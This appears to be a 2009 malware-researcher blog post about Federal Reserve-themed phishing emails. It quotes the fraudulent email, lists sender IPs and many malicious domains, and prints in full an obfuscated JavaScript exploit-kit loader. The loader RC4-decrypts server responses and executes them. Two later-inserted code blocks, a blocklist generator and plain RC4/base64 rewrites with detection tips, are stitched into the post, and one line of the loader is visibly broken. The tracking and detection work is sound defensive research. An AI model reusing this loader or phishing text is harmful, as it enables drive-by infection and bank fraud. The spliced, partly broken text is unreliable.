Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday, 12 May 2009

Federal Reserve goes LuckySploit

I've received several e-mails today, claiming to be from the Federal Reserve - funny considering I'm not in the US. Usually I just forward them to PhishTank and the appropriate authorities/hosting co's, and file them away. This one, however, got me interested because I noticed a relation - remember this?

The story referred to at the ISC references an issue with a multitude of sites hosted by LunarPages being hacked and containing exploits (the sites at LunarPages are still carrying the exploits btw). This time they obviously decided to go via e-mail and use their own sites instead.

The e-mail itself contains the following content:

FEDERAL RESERVE BANK

Important:

You're getting this letter in connection with new directions issued by U.S. Treasury Department. The directions concern U.S. Federal Wire online payments.

A country-wide phishing attack began on May 6, 2009. It's taking place hitherto. Therefore a great number of banks and credit unions is affected by this attack and quantity of illegal wire transfers has reached an extremely high level.

U.S. Treasury Department, Federal Reserve and Federal Deposit Insurance Corporation (FDIC) in common worked out a complex of immediate actions for the highest possible reduction of fraudulent operations. We regret to inform you that definite restrictions will be applied to all Federal Wire transfers from May 12 till May 25.

Here you can get more detailed information regarding the affected banks and U.S. Treasury Department restrictions:

hxxp://usbanks.esecure-federal.us/35634/FRB/phishing/Issue~73891/

Federal Reserve Bank System Administration


The only differences between the 3 e-mails I've received are the "from" addresses (all faked of course), the subject lines, and the domains they point to - all of which are on the same IP, 221.5.74.34 (netname: UNICOM-GD). The subjects I've seen thus far are:

Attention - Important Customer Notification
Important: Federal Reserve Bank!
Corporate Cusomers - Please read carefully

The e-mail headers indicate the following as the origins:

94.222.248.23 (dslb-094-222-248-023.pools.arcor-ip.net)
88.249.38.101 (dsl88-249-9829.ttnet.net.tr)
201.240.92.239 (client-201.240.92.239.speedy.net.pe)

When I first received the e-mail I did some research on the domain itself, and found a plethora of domains, all of which are being used for the same purpose and all of which are on the same IP, 221.5.74.34:

esecure-federal.com
esecure-federal.net
esecure-federal.us
federalbanks.us
federalbanksystem.com
federalbanksystem.net
federalbanksystem.us
federalreserve-direct.com
federalreserve-direct.us
federalreserve-online.com
federalreserve-online.us
fedwire.usatreasury-direct.net
fedwire.usatreasury-direct.us
frb-direct.net
frb-secure.net
mail.federalreserve-direct.us
mail.frb-direct.net
mail.frb-secure.net
mail.usatreasury-direct.net
ns1.esecure-federal.com
ns1.esecure-federal.net
ns1.esecure-federal.us
ns1.federalbanks.us
ns1.federalbanksystem.com
ns1.federalbanksystem.net
ns1.federalbanksystem.us
ns1.federalreservebanks-online.us
ns1.federalreserve-direct.com
ns1.federalreserve-direct.net
ns1.federalreserve-direct.us
ns1.federalreservenet.us
ns1.federalreserve-online.com
ns1.federalreserve-online.net
ns1.federalreserve-online.us
ns1.fedreservebanks.com
ns1.fedreservebanks.net
ns1.fedreservebanks.us
ns1.frb-direct.net
ns1.frb-direct.us
ns1.frb-secure.com
ns1.frb-secure.net
ns1.treasurydept.us
ns1.usatreasury-direct.com
ns1.usatreasury-direct.net
ns1.usatreasury-direct.us
ns2.esecure-federal.com
ns2.esecure-federal.net
ns2.esecure-federal.us
ns2.federalbanks.us
ns2.federalbanksystem.com
ns2.federalbanksystem.net
ns2.federalbanksystem.us
ns2.federalreservebanks-online.us
ns2.federalreserve-direct.com
ns2.federalreserve-direct.net
ns2.federalreserve-direct.us
ns2.federalreservenet.us
ns2.federalreserve-online.com
ns2.federalreserve-online.net
ns2.federalreserve-online.us
ns2.fedreservebanks.com
ns2.fedreservebanks.net
ns2.fedreservebanks.us
ns2.frb-direct.net
ns2.frb-direct.us
ns2.frb-secure.com
ns2.frb-secure.net
ns2.treasurydept.us
ns2.usatreasury-direct.com
ns2.usatreasury-direct.net
ns2.usatreasury-direct.us
usatreasury-direct.net
usatreasury-direct.us
usbanks.esecure-federal.net
usbanks.esecure-federal.us
ustreasury.federalbanks.us
ustreasury.federalbanksystem.com
ustreasury.federalbanksystem.net
ustreasury.federalbanksystem.us
ustreasurydept.frb-direct.net
ustreasurydept.frb-direct.us
wire.esecure-federal.com
wire.federalreserve-direct.com
wire.federalreserve-online.us
wire.frb-secure.net
www.esecure-federal.com
www.esecure-federal.net
www.esecure-federal.us
www.federalbanks.us
www.federalbanksystem.com
www.federalbanksystem.net
www.federalbanksystem.us
www.federalreserve-direct.com
www.federalreserve-direct.us
www.federalreserve-online.com
www.federalreserve-online.us
www.frb-direct.net
www.frb-secure.net
www.usatreasury-direct.net
www.usatreasury-direct.us

The domains they are associated with are clarafin.info, dns2.zief.pl and monkey-squad.net - all of which are involved in malicious activity.
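As an added example (not code from the post), here is what I would do with a list like the one above before filing it: collapse the hostnames to their registrable domains (that is what gets reported to the registrar), and emit hosts-file lines so every name resolves to a sink address, plus a suffix matcher for a URL filter or mail gateway rule. The hostnames in the sample array are a subset of the list above; the last-two-labels rule for the registrable domain is an assumption that holds for the .com/.net/.us/.info names in this campaign, not a general public-suffix implementation.

```javascript
// Added example, not part of the original post. Subset of the post's list of
// hostnames (all on 221.5.74.34 according to the post), one or more per family.
const CAMPAIGN_HOSTS = [
  'esecure-federal.us',
  'usbanks.esecure-federal.us',
  'www.esecure-federal.us',
  'ns1.esecure-federal.us',
  'ns2.esecure-federal.us',
  'federalreserve-direct.com',
  'www.federalreserve-direct.com',
  'wire.federalreserve-direct.com',
  'ns1.federalreserve-direct.com',
  'fedwire.usatreasury-direct.net',
  'mail.usatreasury-direct.net',
  'ustreasurydept.frb-direct.net',
  'wire.federalreserve-online.us',
];

// Registrable domain = last two labels. Assumption: fine for the TLDs used in
// this campaign (.com/.net/.us/.info); a real tool would use the public suffix list.
function registrableDomain(host) {
  const labels = host.trim().toLowerCase().replace(/\.$/, '').split('.');
  return labels.slice(-2).join('.');
}

// Map of registrable domain -> sorted hostnames seen under it.
function groupByDomain(hosts) {
  const groups = new Map();
  for (const h of hosts) {
    const d = registrableDomain(h);
    if (!groups.has(d)) groups.set(d, new Set());
    groups.get(d).add(h.trim().toLowerCase());
  }
  return new Map(
    [...groups]
      .sort((a, b) => a[0].localeCompare(b[0]))
      .map(([d, set]) => [d, [...set].sort()])
  );
}

// hosts-file block: one line per hostname plus the bare domain, so that every
// name in the campaign resolves to the sink address.
function hostsFileLines(hosts, sink = '0.0.0.0') {
  const names = new Set();
  for (const [d, subs] of groupByDomain(hosts)) {
    names.add(d);
    subs.forEach((s) => names.add(s));
  }
  return [...names].sort().map((n) => `${sink} ${n}`);
}

// Suffix match against the registrable domains, for a URL filter or mail
// gateway rule. Accepts defanged hxxp:// links as they are written in the post.
function isCampaignUrl(url, hosts) {
  const blocked = new Set(groupByDomain(hosts).keys());
  let host;
  try {
    host = new URL(url.replace(/^hxxp/i, 'http')).hostname;
  } catch (e) {
    return false;
  }
  const labels = host.toLowerCase().split('.');
  for (let i = 0; i < labels.length - 1; i++) {
    if (blocked.has(labels.slice(i).join('.'))) return true;
  }
  return false;
}

// Stand-alone run: print the hosts block and the domains to report.
if (typeof require !== 'undefined' && require.main === module) {
  console.log([...groupByDomain(CAMPAIGN_HOSTS).keys()].join('\n'));
  console.log(hostsFileLines(CAMPAIGN_HOSTS).join('\n'));
}
```

The hosts file is the blunt instrument (it only blocks names you have already seen); the suffix match is what catches the next `wire.` or `mail.` hostname they add under the same domain, which is exactly what happened with this campaign between the post and the edit.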

The "Federal" domains all load an iFrame to another file on the same server, which contains:

ibat=1738;
dira='t';
illo="dB";
adicit=24;
numen='odeAt';
uirque="0.7";
parvae="app";
speque='s';
audis="l";
morent='b';
puella='B';
ocelo='Vi';
amarem="u";
licuit=16;
saepta=33;
pandar='@';
ducum='p';
curiis='eques';
vicina="2";
vestit="9.02e2";
ibamus='roso';
uocata="";
tantus='.';
patres='u';
regie=31;
viva='gl';
utro=435;
ordine=488;
mento='i';
mouent=8473;
bundy=8423;
aperte='j';
hiemis='UN';
tatius="s";
montem="i";
pareas=6;
ceraue='ames';
nimbos=757;
muso="o";
uertes='View';
pandit='H';
luetis="setA";
sens="4.53e2";
anzus="doc";
jungle='U';
rumpat='2';
obicat='w';
rabida=61;
rupto='c';
avos=6041;
euroo='d';
pebble=4723;
oreque='n';
boree=4;
dolori='y';
nixque='[U';
wattle='o';
libo=2;
budge='.781';
tangit='';
sickie='9';
sono='le';
needle="a";
achate='X';
intexo=6089;
metiri="0.9";
soluti="0.77";
egomet='D';
belli='24';
cynthi=81;
securo="r";
laetae=505;
parmam='cu';
ullas=9;
revoco="tri";
nuptum='5711';
vetor='T';
certae='48';
cque='g';
census="Te";
vagor=8;
canus="37";
velem="d";
obero='e';
edant='W';
cessas='l';
longa=0;
operta='5584';
mint='P';
osque='ine';
teneto='h';
cupant="5.09e2";
ineant='Da';
veho='.8';
esky='6.';
capant=7880;
ortam='do';
lituo='f';
medius='ntW';
abeas='+/';
aperti="t";
credis=(soluti<=.325?2.213e3:''+'A'+puella+'C'+egomet+'E'+'F'+tangit);
pool=(0.5624,'r'+'ing'+tangit);
function alteri(crust)
{
vera=new crust()
}
function infert(myrtum,whip)
{
for(lippie=0;lippie<myrtum;lippie++)whip[lippie]=lippie
}
function pergit(iram,clavum)
{
for(lippie=0;lippie<iram;lippie++)
{
amorem=(amorem+vera[lippie]+clavum[oblata](lippie%clavum[dirty]))%iram;
talis=vera[lippie];
vera[lippie]=vera[amorem];
vera[amorem]=talis
}
}
function labet(lernae,dunny)
{
lippie=(lippie+1)%dunny;
amorem=(amorem+vera[lippie])%dunny;
watson();
vera[amorem]=talis;
stygio(lernae)
}
function watson(bail)
{
talis=vera[lippie];
vera[lippie]=vera[amorem]
}
function stygio(virgam)
{
adnare+=amittoeei[desunt](virgam[oblata](fervet)^vera[(vera[lippie]+vera[amorem])%256])
}
function larry(lernae)
{
for(fervet=0;fervet<lernae[dirty];fervet++)
{
labet(lernae,256)
}
}
function imitat(iussos)
{
lippie=iussos;
amorem=iussos
}
uicus=('.1'>=1?954:bolam);
ashes=(1.6e1,'a');
(8.<=871?uicus:2.)((licuit,this));
slim=(3495.,edocet);
credis+=(6,'G'+'HI'+'J'+'K'+'L'+'M'+'NO'+'');
snit=(6586>.8?araque:5.);
uelato=("6."<7.3e2?marti:31.);
sacrum=(6,amem);
gingiie=(.7<='7.8e3'?snit:8);
adhuc=(27.,uelato)[(7.77e2,uocata+"d"+"o"+"c"+"u"+"m"+"e"+"n"+"t"+uocata)];
desunt=(9218,''+'f'+'r'+'o'+tangit)+(pareas,'m'+'C')+(0.5<='4262'?''+'h'+'a'+'r'+tangit:4)+(6.865e3>=vagor?'C':0.4e1)+(0.61,'o'+euroo+'e'+tangit);
dirty=(6.2e1,sono)+(.41,'ng')+('684'>60?''+'t'+'h'+tangit:ibat);
amittoeei=(cupant>42.?adhuc:.807)[(.6951,'defa'+'ultV'+'iew'+tangit)][(6.,tangit+obicat+'i'+oreque+euroo+'o'+'w'+tangit)][(0.104,'S')+(3.51e2,tangit+dira+'')+(0.45<'274'?pool:.6471)];
credis+=(1e0<='1003.'?'P'+'QRST'+jungle:2e0)+(99.,tangit+'V'+edant+'X'+'Y'+'Z'+tangit);
itabo=(8e0,'ray');
phoebe=(.88,tangit+'a'+'t'+'h'+tangit);
tenebo=(72.,sacrum);
dentum=(6.7e1,tangit+'u'+oreque+'c'+tangit)+(9.61e2>="7"?dira+'i'+wattle+'n':3.);
banjo=(7.2e1,adhuc);
credis+=(63.,''+'ab'+'cde'+tangit)+(397.,tangit+'f'+cque+'h'+'i'+aperte+'k'+'l'+'m'+tangit);
fibro=('974'<=0.722?.9:'e');
vitem=(7962.>5.6e1?banjo:0.47e2);
timens=("0.8"<=373?tangis:4e0);
mori=(".9">6.8e1?161:tangit+'v'+'a'+tangit);
credis+=(355,''+'n'+wattle+ducum+'q'+'r'+speque+'t'+'u'+'')+("0.4"<=863?tangit+'vwxyz01234':0.2)+(bundy,''+'5'+'6'+'78'+sickie+abeas+'='+tangit);
oblata=(53.,tangit+rupto+teneto+tangit)+(1.,'ar'+'C'+tangit)+(8.64e2,''+numen);
if((7.992e3,credis)[(5.1e1,fibro)+(64.,mori)+(7.,'l')])
{
credis=("2666"<=.4031?7e0:tangit);
vitem=(9e0<="3346"?credis:7e0)
}
aequat=(nimbos,tangit+wattle+'r'+'a'+'g'+'e'+tangit);
lucem=(2.22e2,viva);
nimbus=(799>="134"?tangit+'o'+morent+'a'+tangit:889.);
sports=(8>=0.186?vitem:1563);
function tangis(pindan,verum,fovet,arcent)
{
(2e0,alteri)((0.841e3<'3.8e1'?.5:styxeez));
(4.,infert)((5008<6571?256:boree),(0.3451<=".6669"?vera:719.));
(5,imitat)((5e0<='415'?longa:0.4619));
(4e0,pergit)((ullas,256),(825.>=861?.72:pindan));
(7.,imitat)((9.,longa));
adnare=(0.8186<=.1?8e0:tangit);
(1.858e3>=esky?larry:7e0)((3,verum));
return (2.856e3,adnare)
}
fulmeniie=(3.7e1>belli?sports:27);
function amem(pascua,saltus,iubet,mall)
{
var caeso;
uates=(1e0<=125?molem:8.308e3)((7,''+'x'),(intexo,tangit+'r'+'e'+'t'+'u'+'r'+oreque+' '+dira+dolori+tangit)+(7.8e1>=vestit?6427:'peo')+(0.2107,tangit+lituo+'('+'x'+')'+tangit));
nescio=(veho>8.356e3?6e0:molem)(("160"<=2.6e1?3.3e1:'r'+'et'+'urn'+' ne'+'w '+'X'+tangit)+(0.9,'MLH')+(5.7e1,'ttpR')+(9e0>=77?1.47e2:curiis+'t()'));
spell=(9.4e1>=8.4e1?molem:96)((.3947,''+'r'+'e'+'t'+'u'+'r'+'n'+' '+'X'+tangit)+("2867." if(!(5.807e3,caeso)&&((5.35e2<=1?9.8e1:uates)((6745>2e0?spell:8.1e1)()))!=(18,'un'+'def'+osque+'d'))
{
caeso=(4.522e3,nescio)()
}
return (62.,caeso)
}
gimlet=('696'<=7.?1.:fulmeniie)[(2.93e2,'defa'+patres+'lt'+ocelo+'ew'+tangit)][(4.9e1>="1.5e1"?''+speque+'e'+'l'+'f'+tangit:8730)][(.83,tangit+obicat+mento+oreque+euroo+'o'+obicat+'')][(9.29e2>5.235e3?254.:'self'+tangit)][(21,tangit+'do'+parmam+'m'+'en'+'t')][(7582,tangit+euroo+obero+lituo+'a'+'u'+'l'+'t'+'V'+mento+obero+obicat+tangit)][(76<='.5627'?212.:tangit+'F'+tangit)+(8.394e3,dentum)];
usuum=(5<3052.?fulmeniie:287.)[(783>=.55?tangit+euroo+obero+lituo+'a'+'u'+cessas+dira+'V'+'i'+'e'+'w'+'':511.)][(.21>=0.86?.3:speque+'el'+'f')][(92<36?ullas:tangit+'w'+'i'+oreque+euroo+wattle+obicat+'')][(5e0>'37.'?libo:lucem)+(.19>=5823.?4691:nimbus)+(9.2e1,'lSt')+(0.6<=12.?aequat:7977)];
ramumuuz=(9711,fulmeniie)[(licuit,tangit+euroo+obero+lituo+'au'+'l'+dira+ocelo+'e'+obicat)][(0.58>2.32e2?3.9e1:'self'+tangit)][(52<"8."?pareas:tangit+'M'+tangit)+(9e0<1.55e2?phoebe:5)];
styxeez=(.9,fulmeniie)[('0.9e1'<=0.7?6172:'default'+uertes)][(1.16e2<1.5e1?3.:tangit+obicat+'in'+ortam+obicat+tangit)][(0.188<"80"?tangit+'A'+'':1.2e1)+(2.4e2>uirque?''+'r'+'':43.)+(654,itabo)];
poscitjie=new (.3,styxeez)();
molem=(378.<=.4761?57.:gimlet);
unco=(88.<"3.8e1"?5:ashes)+(.946<=66?gingiie:.2)((8654.,credis),(9.42e2<="4e0"?.5:30));
lataettr=(.64>"4639"?5.7e1:meos);
lenis=(18.,molem)((996,tangit+'r'+obero+dira+'')+(0.8165,''+'u'+'r'+oreque+' '+tangit)+(97.,tangit+'tenebo()'));
opinoreea=(3.37e2,molem)((".62"<=227?'x':5),(cynthi>.1150?dolori:.17),(123,'ret')+(2682.<='742'?6e0:'ur'+'n ')+('.72'<=8861?'t'+'imens(x,'+'y)':27.));
audeatqqa=(1.39e2,molem)((4134.,'x'),(6>1930?ordine:tangit+'r'+obero+'t'+tangit)+(.5881,'urn ')+(36,''+speque+'y'+'r'+dira+mento+'s'+'('+'x'+')'+tangit));
uritis=(110<'500'?tangit+wattle+'nr'+obero:3.)+(saepta<"6.1e1"?'a'+'d'+dolori+'st'+tangit:6e0)+(66.,'atec')+(6.678e3>="6073."?tangit+teneto+'a'+oreque+cque+obero+tangit:3e0);
(3.81e2<=670?audeatqqa:0.47)((libo,unco));
function syrtis(tractu,excepi,foedas,ventus)
{
var datis=(64<'8222'?lenis:9117)();
(0.313,datis)[(1e0,"op"+"en"+uocata)]((12.>=5e0?'GET':27.),(7e0,'?')+(2,lataettr)((28.,opinoreea)((4e0>=4.26e2?797:'ruinam'+'yyo'),("641.">=3.97e2?tractu:581))),(71,true));
(1.4e1,datis)[(991,uritis)]=function()
{
if((.68<'6.2e1'?datis:5)[(0.2,""+securo+"e"+"a"+velem+"y"+"S"+aperti+"a"+aperti+"e"+uocata)]==(651<sens?8e0:boree)&&(9154.,datis)[("18"<=saepta?""+"s"+aperti+"a"+"t"+amarem+tatius+"":mouent)]==(150.<79?.6952:200))
{
("3.13e2">6.155e3?6.536e3:molem)((canus>3.?opinoreea:4288)((935<=".58"?55:tractu),(33.<='8'?boree:slim)((.350,datis)[(7>870?.5099:securo+"e"+tatius+"p"+"on"+"se"+census+"xt"+"")])))()
}
};
(2074>=3.623e3?4e0:datis)[(vicina>7.?9609:"sen"+"d")]((ullas,0))
}
function remus(pindan,ratty,sueba,mater)
{
var audiat=ramumuuz["floor"](ramumuuz["random"]()*pindan[dirty]);
volvet+=pindan["substring"](audiat,audiat+1)
}
function miner(verum,pindan,volvet,tenus)
{
for(lippie=0;lippie<verum;lippie++)
{
remus(pindan,lippie,verum,volvet);
}
}
function araque(pindan,verum,tenus,serua)
{
volvet='';
miner(verum,pindan,volvet,tenus);
return volvet
}
function meos(nervis,obvius,peius,tullo)
{
var sciat=(34,tangit);
var adnare;
var lippie;
var scies=(0.8<=.909?longa:9739);
var labori=(0.870,1);
lippie=(7920.,0);
for(adnare=0;lippie<nervis[dirty];lippie++,adnare++)
{
scies=scies*256+nervis[oblata](lippie);
labori=labori*4;
sciat=sciat+credis["charAt"](parseInt(scies/labori));
scies=scies%labori;
if(labori==64)
{
sciat=sciat+credis["charAt"](parseInt(scies));
scies=0;
labori=1;
adnare++
}
if(adnare>=75)
{
adnare=-1;
sciat=sciat+'\n'
}
}
if((.620,lippie)%(.1322,3))
{
sciat=sciat+credis["charAt"](parseInt(scies*((lippie%3==1)?16:4)));
sciat=sciat+((lippie%3)==1?'==':amittoeei[desunt](61))
}
return (1,sciat)
}
function edocet(nervis,fire,hortum,metae)
{
var sciat=(2e0,tangit);
var lippie;
var scies=("7e0">=61?6567.:longa);
var labori=(.265,1);
for(lippie=0;lippie<nervis[dirty];lippie++)
{
if(nervis["charAt"](lippie)==amittoeei[desunt](61)||nervis["charAt"](lippie)=='\n')break;
scies=scies*64+credis["indexOf"](nervis["charAt"](lippie));
labori=(labori==1?64:labori/4);
if(labori!=64)
{
sciat=sciat+amittoeei[desunt](parseInt(scies/labori));
scies=scies%labori
}
}
return ('0.77'<821?sciat:8.)
}
function bolam(aether,locos,stupet,exeant)
{
this[("436."<.866?7.5e1:uocata+"m"+needle+securo+aperti+montem+uocata)]=(5581>=.6?aether:3.73e2);
if((816,aether)[(3e0<=523?uocata+"p"+needle+securo+"e"+"n"+aperti+uocata:3914.)]==(4.,aether))
{
intus=(5e0,'a'+'')
}
else
{
ashes+=(".921">=regie?6e1:pandar)
}
}
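Under the random Latin names, the sample's helper functions are two ordinary primitives, and recognising them is most of the work of reading it: `infert`/`pergit` build and key-schedule a 256-entry table, `larry`/`labet`/`watson`/`stygio` walk it and XOR the keystream into the input (RC4, with strings as byte containers via `charCodeAt`/`fromCharCode`), and `meos`/`edocet` are base64 encode/decode over the alphabet assembled in `credis`. As an added example (my code, not from the post), here are the same two primitives written plainly so they can be matched against the sample side by side; the test vectors are the published RC4 ones, and nothing here reproduces the sample's fetch-and-evaluate behaviour.

```javascript
// Added example, not code from the post: plain rewrites of the primitives the
// obfuscated sample implements, for comparison while reading it.
//   rc4(key, data)      <-> tangis (infert, pergit, larry, labet, watson, stygio)
//   base64Encode(data)  <-> meos (minus its 76-column line wrapping)
//   base64Decode(text)  <-> edocet
// Strings are used as byte containers (one char per byte), as the sample does.

// The alphabet the sample builds piecewise in `credis`, '=' at index 64.
const B64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';

function rc4(key, data) {
  // Key scheduling: identity permutation (infert), then the keyed swap loop
  // using key.charCodeAt(i % key.length) (pergit).
  const S = [];
  for (let i = 0; i < 256; i++) S[i] = i;
  let j = 0;
  for (let i = 0; i < 256; i++) {
    j = (j + S[i] + key.charCodeAt(i % key.length)) % 256;
    [S[i], S[j]] = [S[j], S[i]];
  }
  // Keystream generation (labet + watson) XORed into the data (stygio).
  let out = '';
  let i = 0;
  j = 0;
  for (let k = 0; k < data.length; k++) {
    i = (i + 1) % 256;
    j = (j + S[i]) % 256;
    [S[i], S[j]] = [S[j], S[i]];
    out += String.fromCharCode(data.charCodeAt(k) ^ S[(S[i] + S[j]) % 256]);
  }
  return out;
}

// Hex view of a byte string, for comparing against published test vectors.
function toHex(s) {
  return [...s].map((c) => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
}

// Standard base64 over a byte string (the sample's meos without line breaks).
function base64Encode(data) {
  let out = '';
  for (let i = 0; i < data.length; i += 3) {
    const b0 = data.charCodeAt(i);
    const b1 = i + 1 < data.length ? data.charCodeAt(i + 1) : NaN;
    const b2 = i + 2 < data.length ? data.charCodeAt(i + 2) : NaN;
    const n = (b0 << 16) | ((b1 || 0) << 8) | (b2 || 0);
    out += B64[n >> 18] + B64[(n >> 12) & 63];
    out += isNaN(b1) ? '=' : B64[(n >> 6) & 63];
    out += isNaN(b2) ? '=' : B64[n & 63];
  }
  return out;
}

// Standard decoder: skips characters outside the alphabet (whitespace) and,
// like edocet, stops at the first '=' padding character.
function base64Decode(text) {
  let out = '';
  let acc = 0;
  let bits = 0;
  for (const ch of text) {
    if (ch === '=') break;
    const v = B64.indexOf(ch);
    if (v < 0 || v > 63) continue;
    acc = ((acc << 6) | v) & 0xffff; // never need more than 12 live bits
    bits += 6;
    if (bits >= 8) {
      bits -= 8;
      out += String.fromCharCode((acc >> bits) & 255);
    }
  }
  return out;
}

// Stand-alone run: show the published RC4 vector and a base64 round trip.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(toHex(rc4('Key', 'Plaintext')));            // bbf316e8d940af0ad3
  console.log(base64Encode(rc4('Key', 'Plaintext')));     // u/MW6NlArwrT
  console.log(rc4('Key', base64Decode('u/MW6NlArwrT')));  // Plaintext
}
```

The reason this matters for detection is the wrapper around the primitives: `syrtis` opens an XMLHttpRequest whose query string is base64 of an RC4-encrypted random token, and hands base64-decoded, RC4-decrypted response text to the `Function` constructor (`molem`). The iFrame file is therefore only a loader, and the stage that would actually carry exploit code is never on the wire or on disk in the clear, which goes some way to explaining the empty VirusTotal and Wepawet results below. Hunting for the combination of a 256-entry table with the swap loop, a hand-rolled base64 alphabet, and `Function`/`XMLHttpRequest` reached through `document.defaultView` string concatenation is a more durable signature than anything in the Latin variable names.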


Sadly, detection for it at VT is non-existent:

http://www.virustotal.com/analisis/70f92d8286afa3ca23a770f7ed7f99af

And Wepawet couldn't seem to work with it either:

http://wepawet.cs.ucsb.edu/view.php?hash=b2fe358d386b59d84e6fcdefdd66f17b&type=js

At the time of writing, I've got Malzilla trying to decode it, but it's taking its time (it's been running for over 10 mins, pinching around 80% CPU). If it ever finishes, I'll post the results.

/edit 13-05-2009 01:51

3 more e-mails received in the last 15 mins, and it seems they've got a new domain, wire.federalreserve-online.us (also added to the list above), same IP as the rest though. The sender of the latest 3 is also new, 201.16.204.161 (201-016-204-161.dynamic.idial.com.br).
